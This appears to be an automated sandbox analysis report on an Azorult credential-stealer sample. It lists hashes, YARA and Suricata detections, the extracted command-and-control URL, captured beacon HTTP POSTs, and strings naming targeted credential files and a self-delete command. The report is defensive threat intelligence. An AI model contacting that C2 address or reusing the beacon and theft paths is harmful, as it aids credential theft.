Edit tour

Windows Analysis Report
12E56QE1Fc.exe

Overview

General Information

Sample name:	12E56QE1Fc.exe renamed because original name is a hash value
Original sample name:	289c12d43aa35c8c8bf22bace3358cde.exe
Analysis ID:	1589148
MD5:	289c12d43aa35c8c8bf22bace3358cde
SHA1:	1395cfe674d743b8fe568ef373bd91ae7b030adf
SHA256:	1254f59c4d71b8cdf0601467e71c8d868f14195b9b27479fa82d19f9eb7dfc0c
Tags:	AZORultexeuser-abuse_ch
Infos:

Detection

Azorult

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Azorult

Yara detected Azorult Info Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

Potential time zone aware malware

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

12E56QE1Fc.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\12E56QE1Fc.exe" MD5: 289C12D43AA35C8C8BF22BACE3358CDE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Azorult	AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.	The Gorgon Group	http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ https://any.run/cybersecurity-blog/azorult-malware-analysis/ https://asec.ahnlab.com/en/26517/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult

Malware Configuration

Threatname: Azorult

{"C2 url": "http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x1d61:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd778:$a2: %APPDATA%\.purple\accounts.xml 0xdec0:$a3: %TEMP%\curbuf.dat 0x1a1d4:$a4: PasswordsList.txt 0x151d8:$a5: Software\Valve\Steam
00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x1a360:$v2: http://ip-api.com/json 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
Process Memory Space: 12E56QE1Fc.exe PID: 6508	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: 12E56QE1Fc.exe PID: 6508	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.12E56QE1Fc.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.12E56QE1Fc.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.12E56QE1Fc.exe.400000.0.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
0.2.12E56QE1Fc.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.12E56QE1Fc.exe.400000.0.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
0.3.12E56QE1Fc.exe.2130000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.3.12E56QE1Fc.exe.2130000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.3.12E56QE1Fc.exe.2130000.0.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x18c50:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xbf78:$a2: %APPDATA%\.purple\accounts.xml 0xc6c0:$a3: %TEMP%\curbuf.dat 0x189d4:$a4: PasswordsList.txt 0x139d8:$a5: Software\Valve\Steam
0.3.12E56QE1Fc.exe.2130000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17078:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x114ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.3.12E56QE1Fc.exe.2130000.0.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x16e18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x17478:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18b60:$v2: http://ip-api.com/json 0x177d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
0.3.12E56QE1Fc.exe.2130000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.3.12E56QE1Fc.exe.2130000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.3.12E56QE1Fc.exe.2130000.0.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x19850:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xcb78:$a2: %APPDATA%\.purple\accounts.xml 0xd2c0:$a3: %TEMP%\curbuf.dat 0x195d4:$a4: PasswordsList.txt 0x145d8:$a5: Software\Valve\Steam
0.3.12E56QE1Fc.exe.2130000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17c78:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x120ac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.3.12E56QE1Fc.exe.2130000.0.raw.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x17a18:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18078:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x19760:$v2: http://ip-api.com/json 0x183d2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
0.2.12E56QE1Fc.exe.400000.0.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0.2.12E56QE1Fc.exe.400000.0.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0.2.12E56QE1Fc.exe.400000.0.raw.unpack	Windows_Trojan_Azorult_38fce9ea	unknown	unknown	0x1a450:$a1: /c %WINDIR%\system32\timeout.exe 3 & del " 0xd778:$a2: %APPDATA%\.purple\accounts.xml 0xdec0:$a3: %TEMP%\curbuf.dat 0x1a1d4:$a4: PasswordsList.txt 0x151d8:$a5: Software\Valve\Steam
0.2.12E56QE1Fc.exe.400000.0.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
0.2.12E56QE1Fc.exe.400000.0.raw.unpack	Azorult	detect Azorult in memory	JPCERT/CC Incident Response Group	0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) 0x1a360:$v2: http://ip-api.com/json 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
Click to see the 15 entries

Suricata Signatures

ET MALWARE Win32/AZORult V3.3 Client Checkin M14

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T12:02:01.040672+0100	2029467	1	Malware Command and Control Activity Detected	192.168.2.5	49704	51.15.142.235	80	TCP

ETPRO MALWARE AZORult CnC Beacon M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T12:02:01.040672+0100	2810276	1	Malware Command and Control Activity Detected	192.168.2.5	49704	51.15.142.235	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 12E56QE1Fc.exe

Avira: detected

Found malware configuration

Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Azorult {"C2 url": "http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php"}

Multi AV Scanner detection for submitted file

Source: 12E56QE1Fc.exe	Virustotal: Detection: 73%			Perma Link
Source: 12E56QE1Fc.exe	ReversingLabs: Detection: 87%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 12E56QE1Fc.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Code function: 0_2_004094C4 CryptUnprotectData,LocalFree,

0_2_004094C4

Source: 12E56QE1Fc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\ralopim\sowofej.pdb source: 12E56QE1Fc.exe
Source:	Binary string: r\runtime\crypt\tmp_776930745\bin\fasofunox.pdb source: 12E56QE1Fc.exe
Source:	Binary string: <C:\ralopim\sowofej.pdbr\runtime\crypt\tmp_776930745\bin\fasofunox.pdbp source: 12E56QE1Fc.exe

Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0041303C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041303C
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,	0_2_004111C4
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00414408
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D70
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0041158C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041158C
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00411590 FindFirstFileW,FindNextFileW,FindClose,	0_2_00411590
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D9C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2029467 - Severity 1 - ET MALWARE Win32/AZORult V3.3 Client Checkin M14 : 192.168.2.5:49704 -> 51.15.142.235:80
Source: Network traffic	Suricata IDS: 2810276 - Severity 1 - ETPRO MALWARE AZORult CnC Beacon M1 : 192.168.2.5:49704 -> 51.15.142.235:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php

Source: Joe Sandbox View

ASN Name: OnlineSASFR OnlineSASFR

Source: global traffic	HTTP traffic detected: POST /1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 51.15.142.235Content-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 8b 30 63 ed 47 17 8b 30 65 ec 26 66 9d 26 66 9f 26 67 ea 26 66 9b 45 70 9d 31 70 9d 37 70 9d 31 11 8b 30 6d 8b 30 62 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0`0c0c&fE10cG0e&f&f&g&fEp1p7p10m0b
Source: global traffic	HTTP traffic detected: POST /1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php HTTP/1.0Host: 51.15.142.235Connection: closeUser-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Content-Length: 107Data Raw: 00 00 00 45 14 ef bf bd 30 62 ef bf bd 26 66 ef bf bd 26 66 ef bf bd 46 70 ef bf bd 35 70 ef bf bd 47 70 ef bf bd 3a 70 ef bf bd 37 70 ef bf bd 32 70 ef bf bd 37 70 ef bf bd 3a 70 ef bf bd 33 70 ef bf bd 34 14 ef bf bd 31 11 ef bf bd 30 62 ef bf bd 30 60 ef bf bd 30 63 ef bf bd 30 63 ef bf bd 26 66 ef bf bd 45 17 ef bf bd 31 11 ef bf bd 30 63 ef bf bd 47 17 ef bf bd 30 65 ef bf bd 26 66 ef bf bd 26 66 ef bf bd 26 67 ef bf bd 26 66 ef bf bd 45 70 ef bf bd 31 70 ef bf bd 37 70 ef bf bd 31 11 ef bf bd 30 6d ef bf bd 30 62 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0`0c0c&fE10cG0e&f&f&g&fEp1p7p10m0b

Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.142.235
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.142.235
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.142.235
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.142.235
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.142.235
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.142.235
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.142.235
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.142.235
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.142.235
Source: unknown	TCP traffic detected without corresponding DNS query: 51.15.142.235

Source: C:\Users\user\Desktop\12E56QE1Fc.exe

Code function: 0_2_00418688 GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,

0_2_00418688

Source: unknown

HTTP traffic detected: POST /1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 51.15.142.235Content-Length: 107Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 8b 30 60 8b 30 63 8b 30 63 e8 26 66 9e 45 17 8b 31 11 8b 30 63 ed 47 17 8b 30 65 ec 26 66 9d 26 66 9f 26 67 ea 26 66 9b 45 70 9d 31 70 9d 37 70 9d 31 11 8b 30 6d 8b 30 62 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b0`0c0c&fE10cG0e&f&f&g&fEp1p7p10m0b

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 11:02:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: total_page=1; expires=Sat, 11-Jan-2025 13:02:00 GMT; Max-Age=7200Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressLocation: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 11:02:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeSet-Cookie: total_page=1; expires=Sat, 11-Jan-2025 13:02:01 GMT; Max-Age=7200Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressLocation: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/

Source: 12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/
Source: 12E56QE1Fc.exe, 00000000.00000002.2059464987.000000000079C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php
Source: 12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php%
Source: 12E56QE1Fc.exe, 00000000.00000003.2057437868.0000000002330000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.phpA
Source: 12E56QE1Fc.exe, 12E56QE1Fc.exe, 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, 12E56QE1Fc.exe, 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ip-api.com/json
Source: 12E56QE1Fc.exe, 12E56QE1Fc.exe, 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, 12E56QE1Fc.exe, 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://dotbit.me/a/

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2059320017.0000000000783000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00435255	0_2_00435255
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00434AE5	0_2_00434AE5
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00434650	0_2_00434650
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_0043563D	0_2_0043563D
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: 0_2_00434E83	0_2_00434E83

Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: String function: 004289E0 appears 31 times
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: String function: 00404E64 appears 33 times
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: String function: 004062D8 appears 34 times
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: String function: 00403B98 appears 44 times
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: String function: 00404E3C appears 87 times
Source: C:\Users\user\Desktop\12E56QE1Fc.exe	Code function: String function: 004034E4 appears 36 times

Source: 12E56QE1Fc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
